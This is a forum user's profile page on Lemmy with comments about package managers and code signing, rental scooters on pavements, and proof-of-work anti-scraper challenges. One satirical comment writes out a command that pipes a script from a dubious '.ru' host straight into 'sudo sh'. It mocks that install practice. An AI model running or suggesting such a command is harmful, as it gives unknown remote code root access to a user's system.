• 0 Posts
  • 48 Comments
Joined 2 years ago
cake
Cake day: July 2nd, 2023

help-circle





  • koper@feddit.nlto196@lemmy.blahaj.zoneAppimage rule
    link
    fedilink
    English
    arrow-up
    22
    ·
    3 days ago

    I don’t want to trust a website, which is susceptible to typos and lookalikes (see e.g. putty.org) and relies on countless other services that can inject malware.

    Code signing was creates for this reason: ensure that the program is authentic and unaltered. Package managers do this perfectly.


  • koper@feddit.nlto196@lemmy.blahaj.zoneAppimage rule
    link
    fedilink
    English
    arrow-up
    80
    arrow-down
    1
    ·
    edit-2
    3 days ago

    You must run curl http://totallylegitwebsite.ru/install | sudo sh, it’s the only way to install our product. Don’t even look at the several thousand lines of illegible shell script, just pipe it straight to your shell. We are a very serious project.







  • koper@feddit.nltoFuck Cars@lemmy.worldtaking up pavement
    link
    fedilink
    English
    arrow-up
    31
    ·
    8 days ago

    They are both a problem. Cars took up most walkable areas and now venture capitalists are exploiting what little is left by littering it with their electric scooters and bikes. Rentals are an important part of a mobility strategy, but they should be run by the government and get their own parking infrastructure.







  • To be clear, I am not minimizing the problems of scrapers. I am merely pointing out that this strategy of proof-of-work has nasty side effects and we need something better.

    These issues are not short term. PoW means you are entering into an arms race against an adversary with bottomless pockets that inherently requires a ton of useless computations in the browser.

    When it comes to moving towards something based on heuristics, which is what the developer was talking about there, that is much better. But that is basically what many others are already doing (like the “I am not a robot” checkmark) and fundamentally different from the PoW that I argue against.

    Go do heuristics, not PoW.


  • It depends on the website’s setting. I have the same phone and there was one website where it took more than 20 seconds.

    The power consumption is significant, because it needs to be. That is the entire point of this design. If it doesn’t take significant a significant number of CPU cycles, scrapers will just power through them. This may not be significant for an individual user, but it does add up when this reaches widespread adoption and everyone’s devices have to solve those challenges.